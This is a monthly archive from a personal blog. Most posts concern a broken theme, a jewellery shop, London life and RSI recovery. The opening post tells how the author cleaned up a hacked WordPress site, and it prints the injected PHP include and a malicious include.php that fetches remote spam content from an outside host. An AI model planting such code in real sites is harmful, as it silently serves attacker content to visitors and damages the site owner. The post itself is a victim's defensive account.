August 2009

More on the evil in the woodshed

by Suw on August 31, 2009

CnV is still having spam injection problems. Unfortunately, the upgrades to WordPress and Thesis didn’t solve the problem, and a few days later it was full of spam again. You won’t have noticed because it was hidden, but it would have made the site slow to load and has probably totally screwed my GoogleJuice. I’ve been advised to totally reinstall WordPress, but I’d rather figure out what is going on so that if it happens again I’ll be better placed to deal with it. Blogiculum Vitae has also compromised but, annoyingly, not in exactly the same way.

Cleaning up CnV
The first thing I did was to look at my footer.php, as from looking at the source of chocolateandvodka.com that’s where the spam links seem to have been injected. I found a line or two of code that shouldn’t have been there. Unfortunately I didn’t keep a copy of what they said, but part of it was a call to an “include.php”. I deleted the bad code, and then searched through all the WP php files until I found include.php. When I opened it, it was clearly calling on code hosted on a third party site, so I deleted it. Again, I wish I’d kept the code, but I didn’t think about it until just now!

Anyway, that didn’t do the trick because I got more crap injected into my header, this time. So I’ve just spent some time trawling through and I found a compromised theme. It’s an old theme that I no longer use, Cold Blue. Originally when I opened the themes folder last time, I found all themes had their permissions set so that nothing could execute, and I didn’t remember those permissions settings being like that last time… but I’m not an expert and I couldn’t remember the permissions from the last time I fiddled with WP.

Currently, they look like this:

Wordpress hackage

This is after totally replacing Thesis, and trying to delete Lane-10, another theme I don’t use. I still can’t get rid of the damn Lane-10 folder (or the Cold Blue one either, come to that). Before I changed anything, permissions were set to r-xr-xr-x (read: yes; write: no; execute: yes). (On Blogiculum Vitae, they are set to rwxr-xr-x, which I presume is the right setting.)

Anyway, I opened up Cold Blue and saw:

Wordpress hackage

Which doesn’t look too bad, until you take a look in Images:

Wordpress hackage

Ewww! Evil!

I have deleted the contents of the theme folder. The other themes look like they have not been compromised. I can’t find any other PHP files that look odd. Time will tell if I’ve cleaned it out or not.

UPDATE: Thanks to everyone who’s commented. ManxStef was correct – the hackers did create an admin account, so I have deleted every account except mine. If you were a subscriber and this has affected any way, please accept my apologies.

Sadly, I now have confirmation that my attempt to clean up has not worked – there’s a new spam injection, this time in the header. The code is:

<?php include (“include.php”); ?>

That bit of code was tucked in at the bottom of the header. Just deleting it gets rid of the spam, but there’s got to be something else still lurking in a dark corner that is re-editing my theme files to re-insert that code.

This include.php exists in wp-content/themes/thesis and contains this code:

<?php
set_time_limit(10);
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 7);
curl_setopt($ch, CURLOPT_URL, “http://777-software.com/hearme.html”);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1 );
$RemoteData = curl_exec($ch);
echo $RemoteData;
curl_close($ch);
?>

And here I officially run out of WordPress expertise and am going to have to call in the big guns.

Cleaning up Blogiculum Vitae.
Blogiculum Vitae is running WP 2.8.4 and uses the Thesis 1.1 theme.

Again, the footer.php has been compromised, but this time the spam links have been injected directly into it.

More WordPress hackage

I have sorted through the files to see if I can see where the compromise is, looking at the dates to see if any stand out, as there shouldn’t be anything new there. I haven’t been able to find anything else that looks out of place, so perhaps it’s been compromised using a different, more direct method. Time to upgrade WordPress and Thesis!

If anyone has any more information on this, I’d be most grateful if you could leave a comment. I’m not sure if I’ve solved the problem or just slowed it down a bit. And if you see any spam URLs in the source code of the page, please let me know.

UPDATE: Although the CnV compromise is ongoing, Blogiculum Vitae seems to still be clean. I am thankful for small mercies!

{ Comments on this entry are closed }

Something in the woodshed

by Suw on August 20, 2009

Something very strange happened to Chocolate and Vodka, resulting in it loading a blank page except for the background image. It appears to have been a problem with Thesis, the theme I had been using, although I had not upgraded or changed it (or WordPress) in any way in months. I’m not sure how it could have just broken without me doing anything, but maybe my hosting company changed something in the background. Anyway, we now have the ugly default theme (honestly, can’t WordPress do better?) which will remain until I have time to upgrade everything and/or look for a fix.

I apologise for any pain or damage this causes to your eyes in the meantime.

UPDATE: I have updated WordPress, as it appeared that someone had done something nasty to CnV and caused it to behave badly towards others. The update has fixed whatever was wrong with the theme and hopefully it has also done for whatever exploit was using WP to spam people. If there’s something more I need to do to stop WP spamming others, please be a love and tell me!

UPDATE 2: I’ve just updated Thesis, my theme, as well. Hopefully that should mean no more problems.

{ Comments on this entry are closed }

Folksy shop repopulated

by Suw on August 11, 2009

I haven’t had much of a chance to play with Folksy recently that I’d totally failed to spot that my shop there was empty. Items listed on Folksy are there for a limited time – six months I think – after which they get ‘delisted’. I just re-listed 12 items, but have a whole bunch more that I need to get photos of and list. This is one of them, my Elizabeth Brydges necklace:

Elizabeth Brydges
There are a bunch of other photos on Flickr. Most of my stuff is up for between £14 and £20, but this one goes for £45 as it’s a bit of a challenge to make!

Kevin and I went to the V&A today to go to their new jewellery gallery. I was hoping for some inspiration, but I have to admit that I was rather disappointed. The gallery is a small space, admittedly, but they’ve done nothing more imaginative than pin a bunch of jewels to a black background. Can’t we do better than that?

I would have liked to see some illustrations of how some of these items would have looked in situ. We don’t have breast jewels and stomachers these days, and it’s not entirely clear to me how they were usually worn. There was also some regional jewellery, such as wedding necklace from Spain and a headdress from the Netherland, that were entirely opaque in their mode of wearing. We really could have done with a bust with the headdress (or a replica) fitted as it would have been worn so that we could see exactly how the pieces fitted together.

But no, instead we got cabinets with stuff in. I really thought the V&A would have more imagination than that.

{ Comments on this entry are closed }

Live by the blog, die by the blog

by Suw on August 7, 2009

I just had the realisation that I’ve been stopping myself from blogging recently. I’ve been too busy, too tired, too braindead, yes, but I’ve also been clamping down on my urge to blog. I’m not really sure why, but I don’t like it. I was talking to Steph Booth on IM when I suddenly realised it:

(17:21) Suw: you know, i think one of the reasons that i’m feeling so bad is that i’ve been stoping myself blogging
(17:22) Gummywabbit: aha. blog, blog. we’re bloggers first and foremost – if we don’t blog, we die inside

She’s right. Not blogging is making me feel shuttered and isolated. The main reason I’m not blogging is self-censorship, not wanting to shine a light on certain things that could cause certain reactions in certain people. And I’m still struggling with that a bit, to be honest.

The other thing that holds me back is that, whilst certain aspects of my life are great, others are not so hot and that affects my desire to blog. This new flat, for example, is much bigger and really nice inside, but manages to be both quieter (smaller road) and noisier (our bedroom faces the road, and our upstairs neighbours are noisy) than the old one. My happiness level swings to and fro here. Sometimes it’s great – it’s a good neighbourhood (by day) with some good restaurants within walking distance as well as two parks and good travel connections. Sometimes it’s horrible – when neighbours are banging about at 3 am, car doors are slamming outside and people are having arguments outside our bedroom window.

Frankly, I can’t wait to leave London completely. I will miss all my friends here when we do move, but after four years of stress it has become clear that it’s not possible for us to stay here and be happy. I need to focus on becoming more non-geographic over the next 18 months, so that wherever we go, I can still earn despite the fact that my clients have almost always been based in London. (Although that may be because I am also based in London… I wonder what would happen if we moved to North Wales!)

Ah, well, I’m bought some new beads this week, so I’m going to spend some of my holiday over the next week making new jewellery. My shop is still on Folksy, but all the items have fallen off the listings, so I need to re-list them all and add some more. Maybe that’s a project for this weekend! Oh, and amalgamating my Lost Yod blog with this one, it’d be good to get that done too. That, at least, will give me an excuse to post something here!

{ Comments on this entry are closed }

RSI update: Success!

by Suw on August 2, 2009

I’ve been meaning to write this blog post for a while, but I’ve been a bit busy lately and have barely had time to pause for breath.

Several months ago I started working on strengthening my shoulders at the gym – lots of machine work to try and improve the strength of my whole upper back. I’d noticed that some nights, I’d wake up with pins and needles in my hand and find my shoulders had sorts of ‘collapsed’ in on themselves, and I suspected that maybe that wasn’t helping things. I’ve always had weak shoulders, so figured it couldn’t hurt to do some work on them.

When we moved into our new flat I finally had space to set up a proper office, so I now have my old desk and chair, brought up from Dorset and no longer have to work from the sofa. That, in itself, is a joy. It’s so good to have a door to close at the end of the evening! I’m again pretty sure that my lack of a proper desk and chair have contributed significantly to my RSI. Sitting on the sofa didn’t so much encourage bad posture as force it upon me.

On the advice of my friend Sydney, I bought a Wacom Bamboo Fun graphics tablet and pen, which I now use instead of a mouse/trackpad. Although at the lower end of the graphics tablet market (Sydney has the Cintiq, which is gorgeous but way too expensive for me!), it does me very well. It took me a while to get used to using it instead of the trackpad, but now that I am used to it, I’d never go back. It’s much, much easier for editing long documents because you have much better control of the cursor, plus it encourages larger movements than the tiny, fine motor control movements required on a trackpad. It is, in short, fabulous. And sometimes I even use it for drawing!

Kevin bought me a laptop stand, so now I have my office exactly as I want it: Laptop on stand, Wacom tablet to the left (I’m left-handed), and my lovely Apple bluetooth keyboard in front of the laptop. It works incredibly well as a set up and I’d highly recommend anyone who’s working with a laptop as their main machine to experiment with it as a set-up. I also no longer feel the need to get myself a new screen, as having the laptop screen at a decent height also makes it feel somehow like the screen’s not so small! Not quite sure why…

I’ve been following the exercises in Robin McKenzie’s 7 Steps to a Pain-Free Life, which has really helped me to sort out my own back pain – particularly when I put my back out three weeks ago and could barely move. I usually would have gone to a chiro but I rather lost faith in my chiro in London and didn’t feel I had time to find a new one. As it turns out, McKenzie’s exercises are incredibly helpful and have really given my back a new lease of life.

About a month ago, I went to see a consultant physiotherapist at the University College London Hospital. She did a variety of tests – including a nerve induction test which confirmed that I had mild carpal tunnel syndrome. I explained what I’d been doing and she was very pleased with the changes that I’ve made. Indeed, she said that I’ve done pretty much everything she would have advised me to do.

She also told me to expect all my RSI symptoms to vanish within three months. As they had already subsided considerably, I was ready to believe her. In actual fact, I’ve barely had any problems at all over the last month and have trouble the last time remembering when I had a serious attack overnight.

I still have a way to go in terms of improving my shoulder and back strength, and retraining my posture, but I feel pretty confident now that my RSI is under control.

{ Comments on this entry are closed }